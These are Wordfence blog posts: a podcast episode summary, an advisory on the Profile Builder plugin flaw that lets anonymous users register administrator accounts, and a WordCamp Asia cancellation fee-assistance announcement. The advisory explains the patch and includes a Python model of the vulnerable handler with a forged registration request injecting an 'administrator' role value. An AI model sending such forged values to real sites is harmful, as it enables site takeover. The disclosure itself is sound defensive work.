WordCamp Asia was cancelled this week due to concerns of COVID-19/coronavirus in the region. This week, Wordfence CEO Mark Maunder talks about the decision to offer the WordCamp Asia Cancellation Fee Assistance Package to attendees, volunteers, organizers, and speakers that had planned to travel to this inaugural regional WordCamp.

We also cover a number of WordPress plugin vulnerabilities disclosed this week affecting hundreds of thousands of sites, and over 500 malicious Chrome extensions removed from the Chrome Web Store affecting millions of browsers worldwide.

Here are timestamps and links in case you’d like to jump around:

2:13 Event Manager plugin vulnerability disclosed affecting over 100,000 sites
2:44 GDPR Cookie Consent plugin improper access controls affecting over 700,000 sites
3:44 Profile Builder plugin vulnerability allowed site takeover affecting 65,000 sites
4:49 Google Chrome web store removes 500 malicious extensions affecting millions of browsers.
7:14 Interview with Mark Maunder about WordCamp Asia cancellation, the COVID-19 virus concerns, and the WordCamp Asia Cancellation Fee Assistance Package from Wordfence, GoDaddy, and Yoast.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Have a story you’d like us to cover? Contact us at press AT wordfence [dot] com.

A transcript for Think Like a Hacker episode 65 is forthcoming.

The post Episode 65: WordCamp Asia Cancellation Prompts Community Support appeared first on Wordfence.


Critical Vulnerability In Profile Builder Plugin Allowed Site Takeover

Description: Unauthenticated Administrator Registration
Affected Plugin: Profile Builder (Free, Pro, and Hobbyist versions affected)
Affected Versions: <= 3.1.0
CVSS Score: 10.0 (Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Patched Version: 3.1.1

Earlier this week, a critical vulnerability was patched in the Profile Builder plugin for WordPress. This vulnerability affected the free version available on the WordPress.org repository, as well as the commercial Pro and Hobbyist variants. According to the WordPress repository more than 50,000 sites are running the free version of Profile Builder, and our estimates suggest there are roughly 15,000 installations of the Pro and Hobbyist versions, for an estimated total of 65,000 affected sites.

Profile Builder versions up to and including 3.1.0 are affected by this vulnerability. It is crucial that any site running a vulnerable version of the plugin be updated to version 3.1.1 immediately to avoid site compromise. We have deployed a firewall rule to prevent exploitation on sites running Wordfence Premium. Sites using the free version of Wordfence will receive the rule after thirty days.

In this post we’ll take a look at the vulnerability and discuss its impact. We’ll also detail some steps a site owner can take to mitigate the issue in the event that an immediate update isn’t possible.

Vulnerability Summary

Profile Builder is a plugin designed to create custom forms that allow users to register, edit their profiles, and more. It also features a custom user role editor, allowing admins to assign custom sets of privileges to their site’s users.

To implement these custom user roles in the registration process, the plugin features form handlers to assign a selected role to a new user. This user role field isn’t present by default, but can be added by an administrator to provide a list of approved roles in a drop-down menu.

An example of a Profile Builder registration form with a User Role dropdown field.

Unfortunately, a bug in the form handler made it possible for a malicious user to submit input on form fields that didn’t exist in the actual form. Specifically, if the site’s administrator didn’t add the User Role field to the form, an attacker could still inject a user role value into their form submission.

When an administrator adds the User Role selector to a form, they have to select a list of approved roles for new users. If this list is created, only approved roles will be accepted by the form handler. However, when the User Role field isn’t present and an attacker submits a user role anyway, there is no list of approved roles and any input is accepted.

These two issues combine to allow unauthenticated attackers to register Administrator accounts on vulnerable WordPress sites. With Administrator privileges, an attacker has effectively taken over the site and can deploy malware and other backdoors freely.

These issues have been patched as of Profile Builder version 3.1.1.

Patch Details

As we mentioned in the summary above, the impact of this vulnerability is caused by the interaction of two smaller bugs.

For the first bug, the Profile Builder plugin’s form handler would process input on any of the plugin’s possible form fields, regardless of whether that field was present in the form. To patch this bug, the developers created the validation function wppb_field_exists_in_form(). This validation is now used in the handler function of each possible form field, preventing the injection of unintended values.

/**
 * Function that checks if a field type exists in a form
 * @return bool
 */
function wppb_field_exists_in_form( $field_type, $form_args ){
    if( !empty( $form_args ) && !empty( $form_args['form_fields'] ) ){
        foreach( $form_args['form_fields'] as $field ){
            if( $field['field'] === $field_type ){
                return true;
            }
        }
    }

    return false;
}

Patching this bug effectively prevents exploitation of the second one, but the developers wisely fixed it as well. In addition to confirming the custom_field_user_role field is present on the form, the field handler now explicitly denies attempts to create Administrator users.

/* handle field save */
function wppb_userdata_add_user_role( $userdata, $global_request, $form_args ){

    if( wppb_field_exists_in_form( 'Select (User Role)', $form_args ) ) {

        $roles_editor_active = false;
        $wppb_generalSettings = get_option('wppb_general_settings', 'not_found');
        if ($wppb_generalSettings != 'not_found') {
            if (!empty($wppb_generalSettings['rolesEditor']) && ($wppb_generalSettings['rolesEditor'] == 'yes')) {
                $roles_editor_active = true;
            }
        }

        if (isset($global_request['custom_field_user_role'])) {
            if ($roles_editor_active && is_array($global_request['custom_field_user_role'])) {
                $user_roles = array_map('trim', $global_request['custom_field_user_role']);
                $user_roles = array_map('sanitize_text_field', $user_roles);

                //don't allow administrator value. it should never be here but just in case make a hard check
                if (($key = array_search("administrator", $user_roles)) !== false) {
                    unset($user_roles[$key]);
                }

                $userdata['role'] = $user_roles;
            } else {
                $role = sanitize_text_field(trim($global_request['custom_field_user_role']));
                if( $role !== 'administrator' ) {//don't allow administrator value. it should never be here but just in case make a hard check
                    $userdata['role'] = $role;
                }
            }
        }
    }

    return $userdata;
}

As you can see in the if() statement on line 181 of the plugin source (the wppb_field_exists_in_form() check at the top of the function above), the user role assignment code will not run if wppb_field_exists_in_form() returns false. Additionally, the checks on lines 197 and 204 (the two comparisons against “administrator”) will prevent assignment if the intended role is administrator.
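To make the interaction of the two bugs concrete, here is an added Python model of the role handler (not the plugin's PHP): the patched function mirrors the 3.1.1 code above, the vulnerable one is an assumed reconstruction from the post's description (no field check, no administrator check), and the form definitions and registration submission are constructed.

```python
import re

# Constructed Python model of Profile Builder's role handler (not the plugin's PHP).
ROLE_FIELD = "Select (User Role)"
REQUEST_KEY = "custom_field_user_role"


def field_exists_in_form(field_type, form_args):
    """Mirror of wppb_field_exists_in_form(): is this field type in the form?"""
    for field in (form_args or {}).get("form_fields", []):
        if field.get("field") == field_type:
            return True
    return False


def sanitize(value):
    """Stand-in for sanitize_text_field(): drop tags, trim whitespace."""
    return re.sub(r"<[^>]*>", "", str(value)).strip()


def add_user_role_vulnerable(userdata, request, form_args, roles_editor=False):
    """Assumed reconstruction of the pre-3.1.1 behaviour the post describes:
    the submitted role is taken whether or not the field is on the form,
    and 'administrator' is never rejected."""
    userdata = dict(userdata)
    if REQUEST_KEY in request:
        value = request[REQUEST_KEY]
        if roles_editor and isinstance(value, list):
            userdata["role"] = [sanitize(v) for v in value]
        else:
            userdata["role"] = sanitize(value)
    return userdata


def add_user_role_patched(userdata, request, form_args, roles_editor=False):
    """Python rendering of the 3.1.1 wppb_userdata_add_user_role() shown above."""
    userdata = dict(userdata)
    if not field_exists_in_form(ROLE_FIELD, form_args):   # bug 1 fix
        return userdata
    if REQUEST_KEY not in request:
        return userdata
    value = request[REQUEST_KEY]
    if roles_editor and isinstance(value, list):
        roles = [sanitize(v) for v in value]
        # bug 2 fix; the PHP unsets only the first 'administrator' match,
        # this drops every occurrence, which is the stricter reading.
        userdata["role"] = [r for r in roles if r != "administrator"]
    else:
        role = sanitize(value)
        if role != "administrator":                        # bug 2 fix
            userdata["role"] = role
    return userdata


def effective_role(userdata, default_role="subscriber"):
    """Role WordPress ends up using: the handler's value, else the site default."""
    return userdata.get("role", default_role)


# Constructed forms: one without the User Role field, one with it.
FORM_WITHOUT_ROLE_FIELD = {"form_fields": [{"field": "Default - Username"}, {"field": "Default - E-mail"}]}
FORM_WITH_ROLE_FIELD = {"form_fields": FORM_WITHOUT_ROLE_FIELD["form_fields"] + [{"field": ROLE_FIELD}]}

# Constructed registration submission carrying a role the form never offered.
FORGED_REQUEST = {"username": "newuser", REQUEST_KEY: "administrator"}

if __name__ == "__main__":
    print(effective_role(add_user_role_vulnerable({}, FORGED_REQUEST, FORM_WITHOUT_ROLE_FIELD)))  # administrator
    print(effective_role(add_user_role_patched({}, FORGED_REQUEST, FORM_WITHOUT_ROLE_FIELD)))     # subscriber
```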

Assessing Impact

Considering all of the factors of this vulnerability, we have calculated its CVSS severity score as 10.0 (Critical). View the CVSS calculation here.

This score was determined based on the following metrics:

  • Attack Vector: Network
    • The vulnerability can be exploited via HTTP(S) access to an affected site.
  • Attack Complexity: Low
    • No excessive effort is required by an attacker, just the discovery of a vulnerable form.
  • Privileges Required: None
    • The vulnerability is exploited in the user registration process; no prior authentication is necessary.
  • User Interaction: None
    • No interaction by the site’s administrator is required to exploit a vulnerable form.
  • Scope: Changed
    • The vulnerability is present in a plugin added onto a WordPress application, but successful exploitation allows access far beyond the affected plugin itself.
  • Confidentiality: High
  • Integrity: High
  • Availability: High
    • All three CIA impact scores are High in cases where a full site takeover is possible. An attacker with Administrator privileges can disrupt site behavior, harvest data, and inject malicious content at will.

Short-Term Mitigation

We strongly recommend updating Profile Builder to version 3.1.1 as soon as possible to avoid a critical security event on your site. However, we understand that some users may be restricted by update workflows and other policies that can slow down a proper response.

In the event that your site is using a vulnerable version of Profile Builder and can’t be updated immediately, it’s possible to mitigate the severity of the vulnerability by modifying your existing Profile Builder form fields. Since an attacker can only create an Administrator account if the User Role field doesn’t exist in the form, you can add this field and properly limit it to one or more authorized roles.

A screenshot of Profile Builder’s interface, showing the creation of a Select (User Role) field.

To add this field, access the “Form Fields” page from Profile Builder’s sidebar menu. At the top of this page, a dropdown will ask you to select an option. Choose the “Select (User Role)” option under Advanced. Fill out the form that appears by giving the field a name and description, then select the role or roles that new users should be allowed to access. For most sites, selecting Subscriber and nothing else will be sufficient.

To reiterate, it’s still of critical importance that affected users update their plugins as quickly as possible even when a mitigation like this is available. This should only be relied on as a temporary measure to prevent exploitation until you can patch your site.

Timeline

  • February 10, 2020 – Profile Builder version 3.1.1 is released. “Security update” mentioned in changelog. WPVulnDB entry created by the vulnerability’s discoverer.
  • February 12, 2020 – We deployed a firewall rule to protect Wordfence Premium users from the vulnerability.
  • February 24, 2020 – Proof-of-concept (PoC) to be released, according to the WPVulnDB entry.
  • March 13, 2020 – Firewall rule to be deployed to sites running the free version of Wordfence.

Conclusion

Profile Builder versions up to and including 3.1.0 were affected by a critical vulnerability which could allow hackers to take over a site using the plugin. All variants of the plugin, including Free, Pro, and Hobbyist, contained the bugs responsible for this issue. These bugs were patched in version 3.1.1 of all variants, released on February 10th.

Wordfence Premium users are already protected by a new firewall rule, and sites still using the free version of Wordfence will receive this rule on March 13th. Even with a firewall rule in place, we still strongly recommend performing security updates to thoroughly mitigate the risk to your site.

At this time, we have seen no indication of malicious activity seeking to exploit this vulnerability. We will continue to monitor for new exploitation campaigns that may emerge over time, and will report our findings as they come. If you believe your site may have been compromised as a result of this vulnerability or any other, don’t hesitate to reach out to our Site Cleaning team.

According to the vulnerability’s entry in WPVulnDB, the discovering researcher intends to release a detailed proof-of-concept (PoC) on February 24th. While a bad actor could develop an attack script by examining the changes made in the patched version with little difficulty, the public release of a PoC commonly results in wide exploitation by hackers. It is critically important that all affected users update to version 3.1.1 as soon as possible. To help spread awareness of these concerns, please consider sharing this report with other members of the WordPress community.


The post Critical Vulnerability In Profile Builder Plugin Allowed Site Takeover appeared first on Wordfence.


Wordcamp Asia Cancellation Fee Assistance Package from Wordfence

A few minutes ago it was announced that Wordcamp Asia has been cancelled due to the recent COVID-19 concerns in the region. This was a very tough call, but I believe the right one. To give you some context, I’m going to include an extract from the final part of the World Health Organization Director General’s remarks today:

If we invest now in rational and evidence-based interventions, we have a realistic chance of stopping this outbreak.

Maybe you’re tired of me saying window of opportunity, but there is a window of opportunity.

You strike hard when the window of opportunity is there. That’s what we’re saying to the rest of the world. Let’s be serious in using the window of opportunity we have.

The opportunity was created because of the serious measures China is taking in Wuhan and other cities.

But I don’t think this status can stay the same for long. That’s why we have to use the window of opportunity.

If we don’t, we could have far more cases – and far higher costs – on our hands.

I don’t think anybody wants that. This is a common enemy.

Thank you.

Based on the fact that COVID-19 is transmissible prior to symptoms appearing, aggressive quarantine tactics appear to be the right choice. We have an opportunity as a global community to collaborate to stop this infection from becoming a pandemic. But it will require collaboration to defeat this common enemy.

Cancelling WC Asia 10 days before it commences is a brutally tough call. I’ve had the organizers in my thoughts for the past few days knowing, via backchannels, that they’re agonizing over this. This is the right call.

To help do our part, Wordfence is effective immediately making a fund of $10,000 available to assist with airline and hotel change fees. The Wordcamp Asia organizers have already provided a letter that may assist with refunds and fees and you can find that on the announcement page. So try this first. If you still have trouble, we will refund you up to $200 per person on a first come first served basis. Here are our guidelines:

  • To help assist with the cancellation of Wordcamp Asia, Wordfence is providing a total of $10,000 at a maximum of $200 per person to help cover airline and hotel change fees.
  • To apply, simply email us at wcasia-assistance@wordfence.com and we will reply with what information we need and how the process works.
  • This is available to all Wordcamp Asia 2020 organizers, speakers and attendees on a first come first served basis until the fund runs out.

If you’re able to recover the funds via your company or travel insurance provider, please pursue those avenues first because WCAsia has around 1600 attendees that are affected by this and we would like to help as many people as possible.

If you’d like to discuss this I’m available in real-time on Twitter @mmaunder.

Thank you.

Mark Maunder

Wordfence Founder & CEO.


The post Wordcamp Asia Cancellation Fee Assistance Package from Wordfence appeared first on Wordfence.
